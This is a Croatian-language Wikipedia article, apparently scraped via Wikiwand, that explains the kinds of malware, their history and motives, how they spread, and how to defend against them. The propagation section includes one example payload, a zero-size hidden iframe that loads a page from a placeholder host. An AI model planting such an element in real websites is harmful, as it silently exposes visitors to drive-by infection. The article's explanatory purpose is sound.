From Wikipedia, the free encyclopedia
Malver[1] ili malware (složenica engleskih riječi malicious i software, druge nazive: štetni softver[2][3], zlonamjerni softver[4]) je pojam koji označava softver koji je namijenjen za nanošenje štete na računaru i računarskim mrežama. U osnovi taj se naziv korist programski uradak (kod, skripta ili aktivni sadržaj) stvoren u cilju onemogućavanja ili otežavanja izvođenja pojedinih operacija na sustavu, prikupljanja informacija koje dovodi do njihove zloupotrebe i gubitka privatnosti korisnika, dobivanja neovlaštenog pristupa sistemskim resursima i sustavu općenito, i ostalih zlonamjernih aktivnosti. Neki program se može smatrati štetnim ako se može utvrditi ili pretpostaviti zla namjera autora.
Osim, klasičnih računalnih virusa ovaj pojam označava sve vrste softvera koji na bilo koji način mogu ugroziti računalni sustav ili računalnu mrežu, kao što su trojanci, računalni crvi, rootkitovi, štetni dialeri, špijunski programi, ucjenjivački programi, pojedini oglašivački programi i slično. Veliki dio štetnog softvera je napisan za Windowse, no neki postoje i na Linuxu te na Macintosh i Palm računalima.
Primijećena je rasprostranjenost štetnog softvera kao veoma važnim dijelom internetskog kriminala zajedno s općenitom nesposobnošću tradicionalnih antivirusnih programa da neprestano i kontinuirano štite od sve novijeg i opasnijeg štetnog softvera, što posebno odgovara kriminalcima za stjecanje profita.
Preliminarni rezultati izdani od Symanteca u 2008. godini pokazuju da bi "nivo izdavanja štetnih programa mogao preteći nivo izdavanja onih legitimnih".[5] Prema F-Secureu, "u 2007. godini napravljen je isti broj štetnog softvera kao u prošlih 20 godina zajedno".[6] Najpopularniji medij za širenje štetnog softvera, od kriminalaca do nedužnih korisnika, žrtvi, je Internet, posebno e-mail i World Wide Web (WWW).[7] 29. ožujka 2010. Symantec je proglasio grad Shaoxing u Kini glavnim gradom iz kojeg dolazi štetni softver.[8]
Valja istaknuti da štetni softver nije isto što i defektivni, ali legitimni program u kojem se nalaze softverski bugovi (greške u kodu).
Prije veće dostupnosti Interneta, virusi su se širili tako što bi zarazili boot sektor ili disketu. Stavljajući svoju kopiju u upute u strojnom kodu u izvršnim datotekama, pokretali bi se prilikom svakog pokretanja inficiranog programa ili diska. Rani virusi su bili napisani za Apple II i Macintosh, ali su se počeli više širiti s pojavom IBM PC-a i MS-DOS-a. Ovakvi virusi bili su ovisni o korisnicima koji bi razmjenjivali softver i diskete, na taj način se iznimno brzo šireći u krugovima računalnih hobista.
Prvi crvi koji su se širili mrežom nisu nastali na osobnim računalima, već na višezadaćnim Unix sustavima. Prvi poznati crv je bio Internet Worm koji se pojavio 1988. i koji bi zarazio SunOS i VAX BSD sustave. Za razliku od virusa, Internet Worm nije stavljao svoje kopije u druge programe. Umjesto toga, koristio bi sigurnosnu rupu u programima za mrežni server te bi se počeo pokretati kao samostalni proces. Ovu tehniku koriste i današnji crvi.
S porastom popularnosti operacijskog sustava Microsoft Windows u devedesetima, i fleksibilnim makroima za aplikacije u Windowsima, postalo je moguće stvaranje infektivnog koda u makro jeziku za MS Word i druge programe. Ovi makro virusi bi zarazili dokumente i predloške umjesto aplikacija, iako su makroi u Word dokumentu vrsta izvršnog koda (executable code). Danas je veliki dio crva napisan za Windowse, iako je manji dio, tipa Mare-D[9] i Lion[10], napisan za Linux i Unix sustave. Današnji crvi rade na istom principu kao Internet Worm iz 1988. godine: skeniraju mrežu i pronalaze ranjiva računala kako bi se replicirali. Zbog toga što ne trebaju intervenciju korisnika, crvi se mogu replicirati iznimno velikom brzinom. Tako je, primjerice, SQL Slammer zarazio tisuće računala u samo nekoliko minuta.[11]
Mnogi raniji infektivni programi, kao što je Internet Worm i neki MS-DOS virusi, su bili napisani kao eksperiment ili šala. Uglavnom su ih njihovi autori napisali kao bezopasne ili jednostavno dosadne programe, a ne kao programe koji čine veliku štetu ili destrukciju na računalnom sustavu. U nekim slučajevima nisu mogli predvidjeti koliko će njihove kreacije napraviti štete. Mladi programeri koji su učili o virusima i njihovim tehnikama su ih obično napisali za vježbu ili da vide koliko daleko će se rasprostraniti. Neki od virusa koji su se 1999. brzo širili, poput Davida i crva Melisse su, izgleda, bili napisani kao neslana šala. Prvi virus za mobitele, Cabir, pojavio se 2004. godine.
U to vrijeme se mogu naći i virusi koji su bili napisani sa štetnom namjerom vandalizma, dizajnirani kako bi uništavali podatke ili na drugi način štetili računalu. Takvi su bili neki DOS virusi i ExploreZip crv za Windowse, koji su brisali podatke na disku ili koruptirali datotečni sustav zapisivanjem nepravilnih podataka u njih. Mrežni crvi kao što su Code Red (2001.) i Ramen spadaju u istu kategoriju.
S porastom popularnosti Interneta, štetni softver sve više nastaje zbog želje za profitom. Od 2003. većina brzoširećih virusa i crva su dizajnirani za preuzimanje kontrole nad računalima korisnika za crno tržište.[12] Zaražena zombi računala se koriste za slanje spam poruka, kao "skladišta" dječje pornografije[13] ili za DDoS napade.[14] Druga kategorija koja služi za profit napadača je spyware koji tajno prati korisnikovo služenje računalom ili Internetom, usporava vezu, mijenja postavke sustava, i prikazuje oglase. Oni se općenito ne šire za razliku od virusa i crva te se instaliraju preko sigurnosnih rupa u sustavu ili dolaze zapakirani s određenim aplikacijama, kao s peer-to-peer aplikacijama.
U 80-tima i 90-tima se obično smatralo da se štetni programi bili forma vandalizma ili neslane šale. No, danas se štetni programi sve više pišu s motivom profita (financijskog ili nekog drugog dobitka). Tako se spyware programi rade kako bi se prikupljale informacije o korisniku, prikazivali mu se skočni prozori (pop-ups) ili modificirajući ponašanje internetskog preglednika za financijsku dobit autora spywarea. Primjerice, neki špijunski programi preusmjeruju rezultate internetskog pretraživača na plaćene oglase.
Drugi način pomoću kojeg financijski motivirani autori štetnog softvera mogu ostvariti profit je da izravno koriste zaražena računala da rade za autora štetnog softvera. Tako se spomenuta računala koriste kao proxyi za slanje spam poruka. To su zombi računala (zombie computers). Prednost korištenja zaraženih računala za slanje spam poruka od strane spamera jest anonimnost koja mu se pruža. Spameri također koriste zaražena računala za napad na antispam organizacije uz pomoć DDoS napada uskraćivanja računalnih resursa.
Kako bi kordinirali aktivnost zaraženih računala, napadači koriste koordinatne sustave poznate kao botnetovi. U botnetu, štetni softver ili štetni bot (malbot) se spoji na IRC (Internet Relay Chat) ili na neki drugi chat sustav. Tada napadač može simultano davati upute svim zaraženim sustavima. Botnetovi također mogu biti korišteni za stavljanje poboljšanih verzija štetnog softvera na zaražena računala, otpornih na antivirusne programe i druge sigurnosne mjere.
Isto je tako moguće da napadač ostvari profit krađom osjetljivih informacija svoje mete. Neki štetni programi instaliraju keylogger koji prati pritiskanje svih tipki na tipkovnici i omogućuje krađu lozinki, brojeva kreditne kartice i sl. Ove informacije se potom automatski šalju napadaču, omogućujući mu zloupotrebu navedenih informacija. Na sličan način, štetni softver može uzeti CD ključ ili lozinku u online igri i omogućiti napadaču krađu računa ili virtualnih stvari.
Još jedan način za krađu novca vlasnika zaraženog računala je preuzimanje kontrole nad dial-up modemom i pozivanje skupih telefonskih brojeva (premium-rate). To se može ostvariti dialerom koji poziva skupi broj te korisnik na kraju mjeseca dobije ogroman telefonski račun.
Definicija virusa jednog od poznatih računalnih stručnjaka dr. Fredericka Cohena glasi ovako: virus predstavlja program koji može inficirati druge programe, modificirajući ih tako da uključe novu kopiju njega samoga, po potrebi također modificiranu.[15] Ovo je jedna naizgled komplicirana definicija, ali funkcionira vrlo jednostavno. Virus zarazi (inficira) neki program tako što mu promijeni tijek te se širi umetanjem svojega koda u druge datoteke, što znači da će se pri pokretanju programa nakon što je zaražen prvo biti pokrenut virus, koji će onda pokrenuti legitimni program kako bi se prikrio.[15] Mora se napomenuti da svaki štetni softver koji uništava podatke, prati korisnikove navike korištenja računala ili Interneta, instalira drugi štetni softver na zaraženo računalo i/ili krade lozinke korisnika nije virus ako se ne replicira na spomenuti način. Unatoč tome, mnogi korisnici rabe naziv virus za štetni softver čak i ako se ne replicira.
Virus ima tri glavne kompontente:
Jedini obvezni dio virusa je komponenta[15] koja omogućava infekciju, dok se druge mogu dodati po želji autora virusa. Ponekad je ipak teško drediti razliku između komponenti jer se može dogoditi da samo širenje virusa uzrokuje nuspojave koja se može pripisati nosivoj komponenti.[15] Nosiva komponenta virusa često je ono što dobiva pažnju medija koji ju često preuveličavaju.
Crvi se šire putem računalne mreže i ne moraju inficirati nijednu datoteku na računalu, za razliku od virusa. Dijelimo ih na mrežne crve i one bazirane na domaćinu (host computer worms). Mrežni crvi imaju više dijelova, od kojih je svaki pokrenut na posebnom računalu i provodi najčešće različitu aktivnost, pa upotrebljavaju računalnu mrežu za komunikaciju između dijelova.[15] Mrežni crvi ponekad imaju glavni dio koji upravlja onim drugim dijelovima, a poznati su pod nazivom octopus (hobotnica).[15] Crvi bazirani na domaćinu se pak nalaze u potpunosti na inficiranom računalu te upotrebljavaju mrežnu komunikaciju samo u svrhu širenja na druga.[15] Njihovu podkategoriju čini vrsta crva koja se zove rabbit (zečevi) koji prestaju raditi nakon uspješnog inficiranja drugog računala[15], što znači da na jednom računalnoj mreži može postojati samo jedna njihova kopija.[15]
Crvi se mogu podijeliti i u druge kategorije[15]:
te:
S obzirom na to neki ljudi ne znaju razliku između virusa i crva te ta dva različita pojma miješaju, ovdje će se objasniti ukratko njihova razlika.
Ovo su najpoznatiji tipovi štetnog softvera i oba se repliciraju. Ipak, ne repliciraju se na isti način. Virus je štetni program koji inficira neki izvršni program (executable), i kada se pokrene, onda se počinje širiti i na druge programe. Može imati i nosivu komponentu odnosno payload koja radi druge, obično zlonamerne, aktivnosti. S druge strane, crv se aktivno širi preko mreže s ciljem da zarazi druga računala. On isto može nositi nosivu komponentu. Ovo dakle znači da virus treba korisnikovu intervenciju kako bi se širio, dok crv to radi automatski. Koristeći ovu razliku, zaražene datoteke koje se šire preko e-maila ili dokumenata napisanih u MS Wordu, koje korisnik mora pokrenuti da bi se zarazio njegov sustav, se radije klasificiraju kao virusi nego kao crvi.
Naziv trojanski konj nastao je po poznatoj priči u grčkoj mitologiji o osvajanju grada Troje zloupotrebom povjerenja. Trojanski konji nemaju komponentu samorepliciranja za razliku od crva i virusa, tako da ih korisnici sami moraju kopirati.[15] Oni koriste metodu lažnog predstavljanja kao neki korisni ili poželjni program (npr. program za crtanje) a kad ih korisnik pokrene, ponekad zajedno s očekivanom funckijom, u pozadini provode i neželjene aktivnosti bez korisnikovog znanja. To su najčešće krađa lozinki i drugih osjetljivih podataka (password stealers ili infostealers) te omogućavanje udaljenog pristupa inficiranom računalu neovlaštenoj osobi (backdoors), ali i instaliranje drugog štetnog softvera (downloaders), korištenje zaraženog računala za automatsko slanje spam poruka, brisanje ili izmjenjivanje datoteka itd.
U trojanske konje spadaju i programi koji se lažno predstavljaju kao antivirusi ili antispyware, i na engleskom se ovaj tip programa zove rogue ili fake antivirus. Može ih se dobiti posjećivanjem određenih internetskih stranica, najčešće stranica njihovog "proizvođača" (često i preko sigurnosnih rupa u internetskom pregledniku), ili ih instalira drugi štetni softver prisutan na korisnikovom računalu (npr. Trojan-FakeAV). Oni zapravo detektiraju izmišljen štetni softver na korisnikovom računalu a potom nastoje uvjeriti korisnika u kupnju kako bi "uklonili viruse na računalu". Osim očigledne namjere uznemiravanja korisnika, mogu blokirati prave antivirusne i antišpijunske programe koji bi ih mogli detektirati, te mogu instalirati ostali štetni softver. Vjerojatno najpoznatiji tip trojanskog konja ovakve vrste je SpySheriff, ali poznati su i ErrorSafe, WinAntivirus i XP Antivirus.
Backdoor je način zaobilaženja normalne provjere autentičnosti. Kada je sustav komprimitiran (na jedan od gore navedenih načina, ili nekim drugim), na njega se instalira jedan ili više backdoora kako bi se omogućio lakši pristup računalu u budućnosti. Crackeri koriste backdoor za sigurni udaljeni pristup zaraženom računalu, i usput pokušavaju ostati nezamijećeni. Oni na udaljeno računalo mogu instalirati backdoor uz pomoć trojanskog konja, crva ili nekom drugom metodom.
Govorilo se da proizvođači računala predinstaliraju backdoorove na sustave svojih kupaca radi lakše tehničke podrške, no ovo nikada nije pouzdano dokazano.
U trenutku instalacije štetnog softvera na računalo, veoma je bitno da ostane neprimijećen i nedetektiran, te potom uklonjen. Ovo vrijedi i kad ljudski napadač direktno napada i ulazi u računalni sustav. Tehnika koja se zove rootkit omogućava ovakvu nezamijećenost, tako što se modificira operacijski sustav mete tako da se štetni softver sakrije od korisnika. Rootkit omogućuje sakrivanje štetnog procesa u Task Manageru (engl. hidden process - skriveni proces) ili može spriječiti čitanje njegovih datoteka. Originalno, rootkit je predstavljao skup alata koje bi napadač instalirao na Unix sustav kako bi dobio administratorska (root) prava. Danas se taj termin općenito koristi kad se govori o rutinama skrivanja štetnog programa.
Neki štetni programi imaju rutine koje ih brane od uklanjanja. One ne služe toliko za prikrivanje štetnog programa, koliko za pokušaj onemogućavanja njegovog uklanjanja.
Štetni softver može pokrenuti nekoliko procesa koji nadgleda svaki njegov dio i ponovno pokreće onaj dio kada je god potrebno (obično kad je zaustavljen). Neki štetni softveri mogu imenovati neki svoj proces na taj način da mu ime sliči legitimnoj datoteci (npr. expl0rer.exe - lažna explorer.exe datoteka - legitimna explorer.exe datoteka predstavlja Windows Explorer). Čak im može imati i isto ime kao legitimni proces, s tom razlikom da se štetni proces nalazi na drugoj lokaciji u sustavu.
Štetni softver koji krade podatke (data-stealing malware) je internetska prijetnja koja, kao što joj i samo ime govori, krade osobne informacije mete s namjerom oštećivanja mete direktnim korištenjem podataka ili njihovom underground distribucijom. U kradljivce podataka spadaju keyloggeri, špijunski programi, adware, backdoorovi i botovi. Termin se ne odnosi na aktivnosti poput spama, phishinga, DNS poisoninga, zloupotrebu SEO-a (search engine optimization) itd.
Spyware ili špijunski softver prikuplja informacije o korisniku bez njegovog znanja. Tipično se nastoji prikriti i otežati svoju detekciju. Uglavnom se tajno instaliraju na osobna računala, ali ih na javna, dijeljena ili korporativna računala tvrtki može instalirati vlasnik tih računala, često u obliku keyloggera kako bi pratili ostale korisnike navedenih računala.
Iako naziv spyware sugestira da se radi o programu koji prati korisnikovo korištenje računala, njegove funkcije su mnogo šire od toga. Tako može prikupljati osobne informacije korisnika, popis internetskih stranica koje posjećuje, preusmjeravati na zaražene stranice, instalirati ostali štetni softver, usporavati internetsku vezu, mijenjati postavke računala (vrlo često vezane uz sigurnost, one su snižene ili onemogućene), mijenjati početnu stranicu internetskog preglednika u novu, obično zaraženu, te negativno utjecati na funkcionalnost korisničkih programa.
Postoje programi (kao što su Alexa toolbar, Google toolbar i Eclipse kolektor informacija) koji šalju informacije centralnom serveru o tome koje su stranice posjećene ili koje su funkcije programa bile korištene. Ipak, za razliku od "klasičnog" štetnog softvera ova grupa programa dokumentira aktivnosti i šalje podatke samo uz dopuštenje korisnika. Korisnik ovo može prihvatiti kako bi dobio veći raspon funkcionalnosti u programu te veći broj servisa u njemu, ili, u slučaju Eclipsea, kao vrsta voluntarne podrške razvoju projekta. Neki sigurnosni alati detektiraju ove programe kao štetne, dok neki ne. Status ove grupe je, dakle, veoma upitan i kontroverzan. Neki programi kao što je PDFCreator su napravili isključivanje slanja informacija kompleksnijim nego što bi trebalo biti, tako da tijekom instalacije, korisnik mora isključiti dvije opcije umjesto samo jedne. PDFCreator se još uvijek smatra štetnim programom kod nekih antivirusnih tvrtki, tako da je još uvijek predmet diskusija.
Keylogger ili keystroke logging program je štetni softver, podvrsta špijunskog softvera, koji prati pritisnute tipke na računalu, a koristi se za krađu korisničkih lozinki, brojeva kreditne kartice i ostalih osjetljivih informacija koje potom šalje napadaču. Keyloggeri mogu raditi i snimke ekrana (screenshotove) kako bi napadač bio siguran u točnost podataka. Snimke ekrana se rade periodički ili na korisnikov klik mišem, što znači da ovdje uglavnom nema puno pomoći od tipkovnica baziranih na ekranu, pošto korisnik klika mišem po virtualnim tipkama. Ostale funkcije keyloggera uključuju i:
Adware ili oglašivački softver automatski prikazuje oglase na računalu, koji mogu biti u obliku skočnih prozora (pop-ups), prikazani u korisničkom sučelju nekog programa u kojem se nalaze ili za vrijeme njegove instalacije. Obično se instaliraju kao odvojeni program a dolaze s besplatnim programima, a instaliraju se velikim dijelom zahvaljujući činjenici da većina korisnika pri instalaciji ne čita EULU, to jest uvjete upotrebe programa kojeg instaliraju. Adware se koristi kako bi autor pokrio troškove izrade programa. Sam po sebi adware nije opasan, ali nažalost često dolazi s integriranim spywareom ili drugim štetnim softverom za rušenje privatnosti. Tako spyware prati korisnikove navike, a adware prikazuje oglase koji su u skladu s informacijama korisnikovog profila koji je prikupio spyware. Poput spywarea, adware utječe na perfomanse sustava i/ili internetske veze.
Dialeri su inače legitimni programi potrebni za spajanje na internet (barem na neširokopojasnim vezama) no neki dialeri imaju zlonamjernu funkciju. Oni pozivaju premium-rate telefonske brojeve koji su veoma skupi. Napadači često pretražuju sigurnosne rupe na operacijskom sustavu korisnika računala - potencijalne mete, te ih iskorištavaju kako bi uz pomoć dialera pozivali spomenute skupe brojeve i zaradili novac. Alternativno, neki dialeri informiraju korisnika što rade, s obećanjem da ako pristane da dialer poziva skupi broj, korisnik će dobiti pristup specijalnom sadržaju - raznim MP3 datotekama, pornografiji ili underground programima kao što su keygeni i crackovi. Međutim, riječ je zapravo o trojanskim konjima koji se samo predstavljaju kao spomenuti sadržaj.
Korisnici s DSL-om (i sličnim širokopojasnim vezama) uglavnom nisu meta. Dialer se, doduše, može skinuti i instalirati na njihov sustav, ali pozivanje skupog telefonskog broja nije moguće jer korisnici tipično nemaju svoj dial-up modem (ako ga uopće i imaju) spojen na telefonsku liniju. Ipak, ako je ISDN adapter ili dodatni analogni modem priključen, moguće je da će dialer moći pozvati broj.
Grayware[18] (također i Greynet) je pojam koji se koristi općenito za softver koji može imati neželjeni utjecaj na računalo, ali mnogo manje ozbiljan nego kod štetnog softvera.[19] U grayware spadaju spyware, adware, dialeri, šale, programi za udaljeni pristup računalu (remote access programs) i ostale neželjene datoteke i aplikacije koje nisu virusi, a koji su dizajnirani da narušavaju performanse računala ili računalne mreže. Ovaj termin se počeo koristiti u rujnu 2004.[20]
Grayware programi i datoteke, dakle, nisu klasificirani ni kao virusi ni trojanski konji, ali opet mogu imati neželjeni utjecaj na performanse računala na računalnoj mreži i predstavljati značajne sigurnosne rizike za neku tvrtku.[21] Često grayware radi aktivnosti poput čestog prikazivanja skočnih prozora (pop-ups), praćenja korisnikovih navika i bespotrebnog izlaganja računala sigurnosnim rizicima.
Napomena: u ovom odlomku pojam "ranjivi sustav" može označavati samo jedno računalo i operativni sustav, mrežu ili pak aplikaciju.
Različiti faktori čine neki sustav ranjivim na štetni softver:
Može se vršiti s:
java.security
<iframe src="http://example.net/out.php?s_id=11" width=0 height=0 />Ako napadač dobije pristup internetskoj stranici, ona može biti oteta s jednim jedinim HTML elementom.[22]
World Wide Web, najpoznatiji internetski servis, je kriminalcima najomiljeniji način za širenje štetnog softvera. Današnje internetske prijetnje koriste kombinacije štetnog softvera kako bi nastali lanci infekcija.
Smatra se da jedna od deset internetskih stranica sadržava štetni kod.[23]
Napadači mogu koristiti wikije i blogove za promociju linkova koji sadrže štetni softver.[24] Wikiji i blog serveri mogu biti i direktno napadnuti. 2010. godine napadnut je Network Solutions[25][26], i neke internetske stranice kojima je Network Solutions bio domaćin su bile zaražene i izvor spama.
SMTP prijetnje također predstavljaju popularni način pomoću kojeg se propagira štetni softver. Kako se korisnici prilagođavaju na široko rasprostranjene spam poruke, cyberkriminalci distribuiraju crimeware kako bi napali jednu određenu organizaciju ili tvrtku, često radi financijske dobiti.
Kako su napadi štetnog softvera postajali sve češći, počela se pridavati pozornost zaštiti računala od virusa i spywarea te su se tako počeli i razvijati programi koji su bili dizajnirani specifično za obranu računala. Antivirusni i antišpijunski programi štite na dva načina:
Štetni softver može napasti i inače legitimne internetske stranice, rušeći im reputaciju i dodajući ih na blacklistu. Zbog ove činjenice postoje plaćeni servisi koji nude periodičnu sigurnosnu provjeru[27] internetske stranice, te provjeravaju ima li internetska stranice štetni softver, sigurnosne ranjivosti, zastarjeli softver koji ima poznate sigurnosne probleme i slično. Prijavljeni problemi se prijavljuju vlasniku internetske stranice koji ispravlja propuste. Ponuđač sigurnosne provjere može ponuditi vlasniku internetske stranice sigurnosni bedž koji vlasnik može prikazati samo ako je stranica nedavno skenirana i "čista".
Korisnik treba imati na umu da sama činjenica da ima sigurnosne programe instalirane na svom računalu nije dovoljna i da nijedan sigurnosni program nema stopostotnu zaštitu niti detekciju. Potrebno je dodatno smanjiti rizik od zaraze sljedećim korisnim mjerama:
Seamless Wikipedia browsing. On steroids.
Every time you click a link to Wikipedia, Wiktionary or Wikiquote in your browser's search results, it will show the modern Wikiwand interface.
Wikiwand extension is a five stars, simple, with minimum permission required to keep your browsing private, safe and transparent.